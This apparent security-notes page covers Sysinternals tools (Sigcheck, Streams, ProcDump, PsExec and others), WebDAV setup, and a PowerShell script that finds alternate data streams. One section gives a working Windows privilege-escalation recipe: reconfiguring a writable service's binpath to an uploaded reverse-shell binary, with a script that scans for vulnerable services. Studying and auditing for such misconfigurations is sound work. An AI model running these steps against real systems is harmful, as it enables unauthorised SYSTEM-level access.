killchain-compendium/enumeration/windows/sysinternals.md


Sysinternals and CLI usage

Opening System Properties

sysdm.cpl

Installing the WebDAV client (redirector)

  • Start the Windows WebClient service (this is what lets Explorer and the command line talk to a WebDAV share)
get-service webclient
start-service webclient
  • Open the Network and Sharing Center
control.exe /name Microsoft.NetworkAndSharingCenter

Make sure Network Discovery is enabled (Advanced sharing settings).

  • On Windows Server the redirector is a feature that has to be installed first (note the hyphens on the switches)
Install-WindowsFeature WebDAV-Redirector -Restart
Get-WindowsFeature WebDAV-Redirector | Format-Table -AutoSize

Sigcheck

Sigcheck is a command-line utility that shows file version number, timestamp information, and digital signature details, including certificate chains. It also includes an option to check a file's status on VirusTotal, a site that performs automated file scanning against over 40 antivirus engines, and an option to upload a file for scanning. Unsigned or unexpectedly signed binaries in a system directory are a quick indicator of tampering, which is why the unsigned-files check below is the usual first pass.

  • Check for unsigned files in C:\Windows\system32
sigcheck -u -e C:\Windows\System32
  • -u "If VirusTotal check is enabled, show files that are unknown by VirusTotal or have non-zero detection, otherwise show only unsigned files."
  • -e "Scan executable images only (regardless of their extension)"

Alternate Data Stream (ADS)

By default, all data is stored in a file's main unnamed data stream, but by using the syntax 'file:stream', you are able to read and write to alternates (from the Sysinternals Streams documentation). Alternate data streams are an NTFS feature; Explorer and dir do not show them, so attackers use them to stash payloads next to innocuous files, and Windows itself uses one (Zone.Identifier, the mark-of-the-web) on downloaded files.

  • List the streams of a file
streams file.txt
  • Read or edit a named stream (notepad creates the stream if it does not exist yet)
notepad file.txt:<datastream_name>
or
Get-Content -Path .\file.txt -Stream ads.txt
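The following PowerShell script is an added example, not part of the original page or of the Sysinternals tools: it does what `streams -s <dir>` does (list every alternate data stream under a directory), previews small streams, and then removes one stream the way `streams -d` would. The demo file under `$env:TEMP` is constructed by the script itself.

```powershell
# Added example: PowerShell equivalent of `streams -s <dir>` plus `streams -d <file>`.
# Lists every alternate data stream (ADS) under a directory, previews small ones,
# and shows how to delete a single stream without touching the file's main data.

function Get-AlternateStreams {
    param(
        [string]$Root = '.',
        [switch]$Recurse
    )
    Get-ChildItem -Path $Root -File -Recurse:$Recurse -Force |
        ForEach-Object {
            $file = $_
            # ':$DATA' is the unnamed main stream; anything else is an ADS
            # (Zone.Identifier = mark-of-the-web on downloaded files)
            Get-Item -Path $file.FullName -Stream * -ErrorAction SilentlyContinue |
                Where-Object { $_.Stream -ne ':$DATA' } |
                ForEach-Object {
                    $stream = $_
                    # only read streams small enough to show inline
                    $preview = if ($stream.Length -le 200) {
                        Get-Content -Path $file.FullName -Stream $stream.Stream -Raw -ErrorAction SilentlyContinue
                    } else {
                        '<large, not read>'
                    }
                    [pscustomobject]@{
                        File    = $file.FullName
                        Stream  = $stream.Stream
                        Bytes   = $stream.Length
                        Preview = $preview
                    }
                }
        }
}

# Constructed demo: plant a hidden stream, find it, then delete only the stream.
$demo = Join-Path $env:TEMP 'ads-demo.txt'          # assumed scratch path
Set-Content -Path $demo -Value 'visible text'
Set-Content -Path $demo -Stream 'hidden.txt' -Value 'payload in the ADS'

Get-AlternateStreams -Root $env:TEMP |
    Where-Object File -eq $demo |
    Format-Table -AutoSize

# Equivalent of `streams -d`: drop the ADS, keep the file
Remove-Item -Path $demo -Stream 'hidden.txt'
(Get-Item -Path $demo -Stream *).Stream             # now only ':$DATA'
```

Run it with `-Recurse` against a user profile or a web root when hunting for staged payloads; `-Force` is needed so hidden files are included.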

SDelete

SDelete is a command line utility that takes a number of options. In any given use, it allows you to delete one or more files and/or directories, or to cleanse the free space on a logical disk.

TCPView

TCPView provides a more informative and conveniently presented subset of the Netstat program that ships with Windows. The TCPView download includes Tcpvcon, a command-line version with the same functionality.

tcpview
tcpvcon

Autoruns

Autoruns reports Explorer shell extensions, toolbars, browser helper objects, Winlogon notifications, auto-start services, and much more.

Procdump

ProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike. It can also take a full memory dump of a running process on demand, which is how it is mostly used in incident response and credential-theft scenarios, so its presence on a host is worth explaining.

Process Explorer

The Process Explorer display consists of two sub-windows. The top window always shows a list of the currently active processes, including the names of their owning accounts, whereas the information displayed in the bottom window depends on the mode that Process Explorer is in: if it is in handle mode you'll see the handles that the process selected in the top window has opened; if Process Explorer is in DLL mode you'll see the DLLs and memory-mapped files that the process has loaded.

Procmon

Process Monitor is an advanced monitoring tool for Windows that shows real-time file system, Registry and process/thread activity.

Psexec

PsExec is a light-weight telnet-replacement that lets you execute processes on other systems, complete with full interactivity for console applications, without having to manually install client software. PsExec's most powerful uses include launching interactive command-prompts on remote systems and remote-enabling tools like IpConfig that otherwise do not have the ability to show information about remote systems. It works by copying a service binary to the target's ADMIN$ share and starting it over SMB, so it needs admin rights on the target and leaves a service-installation trail that defenders look for.

Winobj

WinObj is a 32-bit Windows NT program that uses the native Windows NT API (provided by NTDLL.DLL) to access and display information on the NT Object Manager's name space.

BGInfo

It automatically displays relevant information about a Windows computer on the desktop's background, such as the computer name, IP address, service pack version, and more

RegJump

This little command-line applet takes a registry path and makes Regedit open to that path. It accepts root keys in standard (e.g. HKEY_LOCAL_MACHINE) and abbreviated form (e.g. HKLM).

regjump HKLM
  • Query the same keys from the command line instead of the GUI (Get-Item and Get-ItemProperty work against the HKLM: and HKCU: PowerShell drives)
reg query HKLM
Get-Item
Get-ItemProperty

Strings

Strings just scans the file you pass it for UNICODE (or ASCII) strings of a default length of 3 or more UNICODE (or ASCII) characters.

Create a SYSTEM shell through a misconfigured service

Works when a low-privilege user can change the configuration of a service that runs as LocalSystem (SERVICE_CHANGE_CONFIG on the service object). accesschk is part of the Sysinternals suite. Run sc from cmd.exe or as sc.exe: in PowerShell, sc is an alias for Set-Content.

  1. Check the permissions the user has on the service (-c treats the name as a service, -w shows only write access)
accesschk.exe /accepteula -uwcqv <user> <serviceName>
  2. Query the service configuration and note BINARY_PATH_NAME and SERVICE_START_NAME (LocalSystem is the goal)
sc qc <service>
  3. Point the service binary at the msfvenom reverse shell uploaded previously (the space after binpath= is required)
sc config daclsvc binpath= "C:\shell.exe"
  4. Start the service and catch the high-privilege shell on the listener
net start daclsvc
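The script below is an added example (not from the original page and not a Sysinternals tool) that automates step 1 across every service on the host without accesschk: it reads each service's security descriptor with `sc.exe sdshow` and flags any allow ACE that gives a low-privilege trustee SERVICE_CHANGE_CONFIG or a right that implies it. The trustee list and the decision to ignore deny ACEs are assumptions you may need to adjust.

```powershell
# Added example: find services whose DACL lets a low-privilege trustee rewrite the config,
# the precondition for the `sc config ... binpath=` abuse above.
# Service-specific SDDL right codes used here:
#   DC = SERVICE_CHANGE_CONFIG, GA = GENERIC_ALL, WD = WRITE_DAC, WO = WRITE_OWNER
# Trustee aliases treated as "anyone": WD (Everyone), AU (Authenticated Users),
# IU (Interactive), BU (Builtin\Users). Append your own SID or group SIDs as needed.

param(
    [string[]]$Trustees = @('WD', 'AU', 'IU', 'BU')
)

$dangerous = @('DC', 'GA', 'WD', 'WO')

function Test-ServiceConfigWritable {
    param([string]$Name)

    # sc.exe sdshow prints the SDDL on a line starting with "D:"; errors go to stderr
    $sddl = (& sc.exe sdshow $Name 2>$null | Where-Object { $_ -match '^D:' }) -join ''
    if (-not $sddl) { return }                       # access denied or unknown service

    # ACE string layout: (type;flags;rights;object_guid;inherit_guid;trustee)
    # Only allow ACEs ("A") are considered; deny ACEs are ignored (assumption: rare on services).
    foreach ($m in [regex]::Matches($sddl, '\(A;[^;]*;([A-Z]*);[^;]*;[^;]*;([^)]+)\)')) {
        $rights  = $m.Groups[1].Value
        $trustee = $m.Groups[2].Value
        if ($Trustees -notcontains $trustee) { continue }

        # the rights field is a run of two-letter codes; split it into pairs
        $codes = [regex]::Matches($rights, '..') | ForEach-Object { $_.Value }
        $hit   = $codes | Where-Object { $dangerous -contains $_ }
        if ($hit) {
            [pscustomobject]@{
                Service = $Name
                Trustee = $trustee
                Rights  = $rights
                Why     = ($hit -join ',')
            }
        }
    }
}

$findings = Get-Service | ForEach-Object { Test-ServiceConfigWritable -Name $_.Name }
$findings | Format-Table -AutoSize

# Before abusing a hit, confirm what the service runs as:
#   sc.exe qc <Service>   -> SERVICE_START_NAME : LocalSystem is the interesting case
```

A hit only says the config is writable; whether starting the service is also allowed (RP in the same ACE) and whether the account is LocalSystem still have to be checked with `sc.exe qc`, as in step 2.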

Tips & Tricks

  • The whole suite can be run straight from the Sysinternals live share, no download needed; it is a WebDAV share, so the WebClient service from the top of this page has to be running
\\live.sysinternals.com\tools